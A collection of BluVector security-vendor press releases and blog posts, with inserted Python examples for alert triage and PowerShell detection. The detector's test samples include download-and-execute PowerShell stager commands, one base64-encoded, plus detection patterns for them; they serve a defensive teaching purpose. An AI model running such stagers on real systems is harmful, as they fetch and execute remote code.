BluVector Wins U.S. Cyber Command Competition

Company’s AI-powered technology and team tops elite competition by quickly and accurately identifying malware threats

ARLINGTON – July 29, 2019 – BluVector announced today that it won DreamPort’s rapid prototyping event (RPE) held in May 2019. Dubbed “RPE-005: The Chameleons and the Snakes,” the competition gave teams a specific detection challenge for a set period of time in a realistic, competitive, neutral environment using unclassified sample malware families. DreamPort is a cyber innovation and collaboration center created by U.S. Cyber Command (USCYBERCOM) through a Partnership Intermediary Agreement awarded to the Maryland Innovation and Security Institute (MISI).

This event focused on the introduction and detection of malware signature diversity in a simulated USCYBERCOM cyber battlefield environment. Defender teams competed by creating tools to automate the classification of threats as benign or malicious. After several rounds, BluVector received the best combined performance scores as scored by USCYBERCOM.

BluVector’s next-generation intrusion detection system, powered by its machine learning technology, helped the team classify the sample files as benign or malicious more accurately than any other competing team. By examining the content of a file for characteristics that represent good or malicious software, BluVector is able to identify attributes of files designed to perform the functions typical of malware.

“When we’re dealing with malware and its potential to disrupt operations and damage organizations, accuracy and speed matter,” said Travis Rosiek, BluVector chief technology officer. “BluVector has more than a decade invested in our machine learning technology, which is reflected in winning this prestigious challenge.”

BluVector became part of Comcast in March 2019. The company will be showing its BluVector Cortex product at several upcoming events including Black Hat 2019 (August 3-8), DoDIIS (August 18-21), TechNet Augusta (August 19-23) and DSEI 2019 (September 10-13).


Cybersecurity Predictions for 2019

As a cybersecurity company, our employees are always looking ahead to see what’s on the 2019 threat horizon. The great news is that, as we report regularly in the BluVector Threat Report, BluVector continues to use its AI-driven network security knowledge to find new threats without signatures.

Yet, I was curious. So, I decided to ask our leadership what they’re thinking about for 2019 (you can read Dave Capuano’s comment in Forbes’ 60 Cybersecurity Predictions For 2019). As you can imagine, there’s no simple, single view about which cybersecurity trends or developments will signify the biggest changes in the industry or the challenges that organizations face. Yet, as an AI-driven network security platform company, we know that the powers of machine learning and AI are a growing focal point for companies… and a growing concern as attackers start to incorporate these technologies into their attacks (as we talked about in our recent On-Demand Webinar: Weaponizing AI: The Future of Cybersecurity).


"Disinformation and hate speech have outgrown the digital infrastructure’s ability to identify, manage and contain them. As a result, a discussion about the need for a content delivery ecosystem that promotes (and values) 'truth' has gone mainstream. This year, the cold reality will hit us that there really is no single truth; truth has become debatable regardless of the evidence, and determining truth is less about representing facts than about picking sides.

In 2019, I predict that it will become clear that the information and analytics systems that are on the bleeding edge of creating and policing truth – particularly AI-based technologies – are themselves part of the 'bias' problem. This will lead to the start of a fundamental shift in how we think about truth – not in binary terms – but as points on a spectrum, with underlying information systems and analytics systems under fire for their inability to either measure or enforce the integrity of their underlying data sets and analytics methods."

Kris Lovejoy, CEO, BluVector


"In 2019, I predict that organizations will finally realize that reactive cybersecurity doesn’t work anymore. Reactive cybersecurity examples include check-the-box compliance (which hasn’t evolved in 15 years), an over-reliance on signatures/threat intelligence ("a next generation form of signatures") or waiting to respond to a breach.

I’m hopeful organizations who rely on outdated and reactive approaches to cybersecurity will evolve and incorporate a proactive approach to cybersecurity and mitigating threats. As we've seen over the years, cyber threat actors adapt faster than compliance standards or signatures can be updated. If organizations don’t evolve and become more proactive in their approach to cybersecurity, and cyber adversaries become more destructive and disruptive, I also predict that more and more organizations will be gravely impacted and go out of business."

Travis Rosiek, CTSO, BluVector


"I predict that within the next year we will have the first confirmed use of artificial intelligence/machine learning in the delivery, development or deployment of malware. Today, many in the security industry assume that adversaries will leverage AI/ML to improve their breach success rates and return on investment. We have yet to identify such complexity, however, in the wild. This will change in 2019. Analysts are becoming more aware of the tell-tale signs of the use of AI/ML in how malware is constructed by their creators and what behaviors it performs once deployed."

Dr. Scott Miserendino, VP, Research and Development, BluVector


How to Observe Computer Security Day

Computer Security Day is a time of reflection for both IT teams and their end-users before the holiday-rich month of December begins. It's time to take a few minutes to identify your security risk level and how to minimize it. Here are eight "smack you in the face" considerations that you can use to increase and update your security posture:

  1. Find a security buddy and cube/office swap. You don’t have to officially “buddy up” like summer camp. Instead, find a fellow employee in your department to change cubes or offices to see what potential violations might be easily observed and remediated. Such things might include passwords written on yellow stickies or paper under your keyboard, in your drawer or elsewhere. These make it very easy for unauthorized people to access your computer.
  2. Autocomplete passwords become auto-enablers. Letting autocomplete remember your passwords on all your devices, and especially for secured networks, SharePoint and the like, means that anyone who sits down at your unlocked computer gets nearly open-door access to everything those credentials unlock.
  3. Enable 2FA whenever possible. Sure, this may tie your cell number to your work accounts, but it drastically improves the level of security: a stolen or guessed password alone is no longer enough to log in from another device. Where the service offers it, prefer an authenticator app or a hardware security key over SMS codes, which can be intercepted or redirected through SIM-swap fraud.
  4. Get a password storage app. Most people now have a smartphone, and there is a wide variety of password manager apps that let you securely store all your passwords in one place behind a single strong master passphrase. Yes, this ESPECIALLY includes IT and NOC teams. Reputable managers encrypt the vault with a key derived from that master passphrase, are easy to use and, with a broad selection of apps, let users find a UI that suits them.
  5. Watch your company’s security videos. Yes, boring. Yet, it is a good way to rediscover what your corporate compliance rules are, how you’re aligning to them and how you can further increase your company’s security.
  6. Nag your insecure co-workers. We’re not going to tell you to narc on your co-workers (that’s #7), but if they’re leaving their computer unlocked over the weekend or for long stretches of time, feel free to remind them.
  7. When nagging doesn’t work, report the violation. Let’s face it, corporate access is a privilege and not a right. If a co-worker is acting completely negligently of the rules and increasing the potential for a breach or unauthorized access, reach out to your security team. They can tell you what can be done to alert the user, or they can find another reason to check that user’s access remotely. Often, this can remain an anonymous request.
  8. It’s your laptop, not your family’s. Your device is usually tied to your account, and it is yours to secure. If you happen to work over a vacation or somewhere where someone else wants to use your company-sanctioned device, just say no. Your spouse has not had the training and does not know the rules you’re complying with, so why let them use your device? Note: IT teams will treat any violation on your work device as your responsibility. This especially comes into play with children, who often don’t understand the ramifications of staying secure and decide to download an old version of Flash so they can play an old browser-based game.

BluVector Wins Multimillion-Dollar Contract with U.S. Government Agency

Company Grows New Annual Contract Value by 130% in 1H 2018

BluVector, a leader in AI-driven network security technology, today announced it has won a multimillion-dollar contract with a U.S. government agency. BluVector is an AI-driven sense and response network security platform that makes it possible to accurately and efficiently detect, analyze and triage sophisticated threats including fileless malware, zero-day malware and ransomware in real time.

As is the case in virtually every industry, government security teams must prepare to face the rapidly increasing volume and sophistication of threats. This problem is made even more difficult by a shortage of trained talent armed with the right capabilities to protect against these emerging threats. The U.S. government has taken the opportunity to confront these challenges head-on, investing in the future through projects focused on artificial intelligence, machine learning and other forward-leaning technologies, such as those deployed by BluVector.

BluVector provides a revolutionary solution to these escalating risks, leveraging supervised machine learning to deliver highly accurate detection of advanced threats in milliseconds. Furthermore, the platform automatically aggregates threat and network data that incident response teams use as context for decision making, shortening the response window and vastly improving analyst efficiency.

"The U.S. government has stated that cyber threats are now the greatest risk to the country," said Kris Lovejoy, CEO, BluVector. "BluVector, born within the defense and intelligence sectors to solve the government’s hardest malware detection challenges, brings over a decade of experience in detecting threats against the government. We're continuing to serve the growing security needs of federal agencies by helping them lower risk, increase compliance and improve threat detection and response capabilities."

BluVector has experienced significant traction in the commercial and public sectors, serving companies ranging from the middle market to some of the largest enterprises and federal agencies in the world. In the first half of 2018, BluVector has already grown its new annual contract value by 130 percent versus all of 2017. These wins have spanned numerous industries, including financial services, healthcare, manufacturing and technology.


When Cyberattacks Act Like Digital Hurricanes

As the United States' East Coast prepares for the impact of hurricane season, we are reminded of the level of preparation that cyber security teams need to go through to protect their networks in the face of a potential disaster.

The sciences of weather prediction and threat intelligence share many similarities. Just as meteorologists can see a storm brewing and track its initial movements, cyber threat intelligence professionals can often see a threat campaign emerging. Yet the exact path of a storm and the damage it will do are very hard to predict, much like the difficulty in predicting who will be the target of a threat campaign, what tools will be used, or what the impact will be. As with most uncertainties, weather-related or cyber, preparation is key.

Earlier this year, BluVector’s CTO, Travis Rosiek, wrote a piece for Cyber Security: A Peer-Reviewed Journal called "Chief Information Security Officer Best Practices for 2018: Proactive Cyber Security" in which he detailed a better approach to cyber security preparedness. The piece, available in PDF form here, helped us reexamine how security teams build better responses to cyber security disasters. Interestingly, these tactics parallel the preparation we're seeing in anticipation of this season’s hurricanes.

Data: Predicting a hurricane's path is no easy task, so meteorologists leverage a variety of weather models that rely on a massive amount of data to make predictions about how a hurricane will move and grow. These models are increasingly tuned with machine learning against previously observed hurricanes, improving prediction capabilities over time.

Similarly, with a cyberattack, having as much data as possible about an impending threat early on enables security teams to better understand and prepare for the threat. Solutions that leverage machine learning to learn from the behaviors of past attacks can also help organizations predict and defend against incoming threats, even if they do not exactly match previously seen events.

Target: As we're seeing in areas most likely to be affected by hurricanes this season, a critical first step is physical preparedness. Officials are removing people from high-risk areas and preparing for power outages and food shortages, so as to minimize the impact the storm has on the regions’ most valuable assets: their people.

In the cyber realm, there are numerous ways organizations can prepare for potentially damaging threats. One of the most basic and essential tactics for reducing threat risk is regularly backing up critical data stores. Backups only help if they survive the incident, so keep at least one copy offline or otherwise unreachable from compromised accounts, and test restores periodically; ransomware operators routinely seek out and delete any backups they can reach. While organizations must also worry about data leaks and not just destruction, a sound backup process ensures companies can survive most business continuity disruptions caused by cyber threats.

Protection: In a hurricane, sea walls and other tools might reduce the initial surge of a storm, but there's often just no way to stop all the damage. Therefore, areas likely to be impacted must develop a responsive infrastructure in order to stop or reduce the damage, using secondary protection techniques such as effective storm drainage.

In protecting against a cyber-attack, a firewall might hold back the attack's surge, but like a sea wall, it often isn’t sufficient. However, having a secondary level of protection behind that wall can greatly reduce the damage. When organizations take a proactive approach toward addressing these risks, such as by investing in tools specifically designed to pick up on threats that bypass the first layer of defense, they are often able to prevent the damage entirely.

Duration: The winds generated by hurricanes can cause a massive amount of damage during the first few hours or days of the storm. However, it is often the longer-lasting flooding and standing water that cause the greatest amount of long-term damage. Roads, homes, and other infrastructure are no match for this length of abuse.

When it comes to cyber, an initial attack can be devastating, but more often than not, it is threats that have achieved significant dwell time that cause the most damage. Dwell time is calculated as the amount of time a threat remains active within a network or computing device before it is detected. The longer the attack is live within a network, the greater the potential impact due to data exfiltration, lateral movement, or other malicious actions.

Response: Whether in the case of a hurricane or a cyber incident, the response can spell the difference between an inconvenience and a catastrophe. In both scenarios, responders must make split-second decisions with less than perfect information. When it comes to hurricanes, this may entail sending emergency medical resources to one area versus another, without having boots on the ground to provide recon on affected regions.

For cyber incident responders, relevant context and prioritization are absolutely critical to effective response. To gain this context and prioritization, organizations must invest in solutions that correlate detection data with supporting information from throughout their environment. With this accurate information, a security organization can rapidly respond to the highest priority threats before damage is done.
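To make the dwell-time and context points above concrete, here is a small added example, written for this page rather than taken from BluVector's product, that computes dwell time for constructed alert records, joins each alert with asset context from a constructed inventory, and ranks the alerts for response. Host names, timestamps, criticality values and the scoring weights are all illustrative assumptions.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed detection records, as a network sensor or SIEM might emit them.
# "first_seen" is the earliest evidence of the activity; "detected" is when an
# alert actually fired. Hosts, times and confidences are made up for this example.
ALERTS: List[Dict] = [
    {"id": "a1", "host": "ws-042", "signal": "malicious-download",
     "first_seen": "2018-08-01T09:15:00", "detected": "2018-08-01T09:20:00", "confidence": 0.9},
    {"id": "a2", "host": "db-prod-01", "signal": "periodic-beaconing",
     "first_seen": "2018-07-02T03:10:00", "detected": "2018-08-01T10:05:00", "confidence": 0.7},
    {"id": "a3", "host": "lab-vm-7", "signal": "scanner-noise",
     "first_seen": "2018-08-01T08:00:00", "detected": "2018-08-01T10:00:00", "confidence": 0.4},
]

# Constructed asset inventory: the "supporting information" used for context.
# lab-vm-7 is deliberately missing; unknown assets must not silently fall off the list.
ASSETS: Dict[str, Dict] = {
    "ws-042":     {"criticality": 2, "owner": "marketing", "tags": ["workstation"]},
    "db-prod-01": {"criticality": 5, "owner": "platform",  "tags": ["database", "pii"]},
}

UNKNOWN_ASSET = {"criticality": 3, "owner": "unknown", "tags": ["unknown-asset"]}
DWELL_CAP_DAYS = 30.0  # beyond a month, extra dwell no longer raises the score


def dwell_time(alert: Dict) -> timedelta:
    """Dwell time: how long the activity was live before it was detected."""
    first = datetime.fromisoformat(alert["first_seen"])
    found = datetime.fromisoformat(alert["detected"])
    return found - first


def priority_score(alert: Dict, asset: Dict) -> float:
    """Illustrative ranking: confidence x asset criticality x a dwell factor in [1, 2]."""
    dwell_days = dwell_time(alert).total_seconds() / 86400.0
    dwell_factor = 1.0 + min(dwell_days, DWELL_CAP_DAYS) / DWELL_CAP_DAYS
    return alert["confidence"] * asset["criticality"] * dwell_factor


def triage(alerts: List[Dict], assets: Dict[str, Dict]) -> List[Dict]:
    """Join each alert with its asset context and return them highest priority first."""
    enriched = []
    for alert in alerts:
        asset = assets.get(alert["host"], UNKNOWN_ASSET)
        enriched.append({
            **alert,
            "owner": asset["owner"],
            "tags": list(asset["tags"]),
            "dwell": dwell_time(alert),
            "score": priority_score(alert, asset),
        })
    return sorted(enriched, key=lambda e: e["score"], reverse=True)


if __name__ == "__main__":
    for row in triage(ALERTS, ASSETS):
        print(f'{row["score"]:5.2f}  {row["id"]}  {row["host"]:<11} owner={row["owner"]:<9} '
              f'dwell={row["dwell"]}  {row["signal"]}')
```

Run as a script, the month-old beacon on the database host ranks above the high-confidence but five-minute-old workstation download, because both asset criticality and dwell time feed the score; the lab host missing from the inventory stays in the queue with a default criticality instead of vanishing, which is the failure mode an inventory join must be designed around.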

Cleanup: After the event has occurred, the critical activity of cleanup begins. This is a time to assess what caused the damage, where the damage happened and where to put any available resources. For those who have experienced hurricanes before, they know this is where leadership matters most. Having the right direction and course of action is crucial to the speed of cleanup and the ability to better prepare for these types of events in the future.

So too is it the case with cyber security, where the head of a security organization must determine how to remediate any damage sustained in a security incident, and what preparations are necessary to protect against the next attack.

Hurricanes have the tendency to be much more dangerous than a cyber event. They put lives at risk, destroy homes and damage physical property. Our thoughts go out to those who have prepared their areas to face these storms, as well as disaster management leaders, first responders and anyone else affected by hurricanes.


BluVector Expands Real-Time Detection of Fileless Malware on the Network

BluVector Demonstrates New Features Extending its Fileless Malware Detection and Response Capabilities at Black Hat 2018

Arlington, Va. – August 2, 2018 – BluVector, a leader in AI-driven network security technology, today announced the latest version of BluVector® Cortex™, the company’s flagship platform, capable of sensing and responding to the world’s most sophisticated threats in real-time.

This latest upgrade focuses on further innovation within the platform’s network-based fileless malware detection, offering the ability to detect the greatest range of fileless attacks and automatically block these threats through its rich partner ecosystem.

"BluVector Cortex continues to evolve ahead of the industry with the expansion of its real-time detection of zero-day fileless malware on the network, providing the greatest breadth of fileless coverage and the only solution that empowers threat analysts with targeted logging surrounding a fileless event," said Kris Lovejoy, CEO, BluVector. "We're excited to return to Black Hat to show how these new capabilities can help organizations overcome one of the biggest security challenges of 2018 – detecting and responding to fileless malware."

The company also leverages its strong partner alliances, including a partnership with Carbon Black, to offer a unique solution on the market, capable of providing automated protection from fileless malware.

"As cybercriminals continue to evolve, we’ve seen an increase in fileless attacks," said Jim Raine, Director of Technology Alliances, Carbon Black. "By combining BluVector and Carbon Black, customers are able to achieve end-to-end, immediate protection from advanced threats."

Enhancements to BluVector Cortex include new features that expand detection coverage, improve the investigation and response workflow and improve scalability. Major new features and enhancements include:

  • PowerShell Detection – In addition to its existing coverage of JavaScript- and VBScript-based attacks, BluVector now also supports the analysis of PowerShell scripts in network traffic, identifying potential zero-day attacks before they have the chance to cause damage.
  • Fileless Script Capture and Context – Access to the actual scripts and related network traffic from a fileless attack all in one place enables an organization to easily investigate and even reverse-engineer a threat without the need for expensive full packet capture.
  • Advanced Threat Investigation – Today’s threats often make use of multiple stages and threat vectors, which can make investigation a very manual process. Enhanced search capabilities and new filters simplify and automate this correlation process, allowing analysts to quickly understand if an event was a standalone incident or part of a larger attack.
  • 20G Form Factor – Support for very large environments makes BluVector Cortex the only solution capable of detecting never-before-seen file-based and fileless malware in real-time on enterprise- and data center-grade networks.
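As an added illustration of what analysing PowerShell pulled off the wire involves, the following is a rule-based sketch written for this page; it is not BluVector's machine-learning classifier or any code from the product. It scores PowerShell command lines and script bodies such as might be recovered from captured traffic, and it unwraps the -EncodedCommand form (base64 over UTF-16LE), a common way to hide a download cradle from naive string matching. The samples, the 203.0.113.x addresses (from the TEST-NET-3 documentation range) and the indicator weights are all constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples standing in for script text recovered from network traffic.
# Addresses are from the TEST-NET-3 documentation range; nothing here is a real capture.
SAMPLES: Dict[str, str] = {
    "benign_inventory":
        "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object Length",
    "stager_plain":
        "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://203.0.113.5/a.ps1')\"",
    "stager_encoded":
        "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(
            "$c=New-Object System.Net.WebClient;"
            "Invoke-Expression $c.DownloadString('http://203.0.113.5/b.ps1')"),
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# (pattern, weight, label). Weights are illustrative, not tuned on real data.
INDICATORS: List[Tuple[re.Pattern, int, str]] = [
    (re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"), 3, "invoke-expression"),
    (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"), 3, "download-cradle"),
    (re.compile(r"(?i)FromBase64String"), 2, "inline-base64"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2, "hidden-window"),
    (re.compile(r"(?i)-nop(?:rofile)?\b"), 1, "no-profile"),
    (re.compile(r"(?i)-noni(?:nteractive)?\b"), 1, "non-interactive"),
    (re.compile(r"(?i)\[System\.Reflection\.Assembly\]::Load|Add-Type"), 2, "in-memory-load"),
]
SUSPICIOUS_THRESHOLD = 5


def split_encoded_command(text: str) -> Tuple[str, Optional[str]]:
    """Return (visible text with the base64 blob removed, decoded script or None).

    The blob is removed so that indicator regexes are matched against the real
    payload rather than against random-looking base64 characters."""
    m = ENC_FLAG.search(text)
    if not m:
        return text, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return text, None  # malformed: fall back to scoring the visible text only
    return text[:m.start(1)] + text[m.end(1):], decoded


def analyze_script(text: str) -> Dict:
    """Score the visible text plus any decoded payload; each indicator counts once."""
    visible, decoded = split_encoded_command(text)
    views = [visible] + ([decoded] if decoded is not None else [])
    hits = set()
    score = 0
    for view in views:
        for pattern, weight, label in INDICATORS:
            if label not in hits and pattern.search(view):
                hits.add(label)
                score += weight
    if decoded is not None:
        hits.add("encoded-command")
        score += 2
    return {
        "score": score,
        "indicators": sorted(hits),
        "decoded": decoded,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign",
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        result = analyze_script(sample)
        print(f'{name:<17} {result["verdict"]:<10} score={result["score"]:>2}  {result["indicators"]}')
```

The point of the encoded sample is that the visible command line carries only weak hints (hidden window, no profile); the download cradle and Invoke-Expression are only seen once the UTF-16LE base64 payload is decoded, which is why any network-side script analysis has to normalise encodings before it matches on content. A keyword list like this is easy for an attacker to evade by obfuscation, which is the gap that the content-based classifiers the text describes are meant to close.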

BluVector will demonstrate its new capabilities at Black Hat USA 2018, Booth #2504, from Aug. 4-9, 2018 at Mandalay Bay in Las Vegas.

You can follow BluVector’s activity at Black Hat on Twitter and LinkedIn.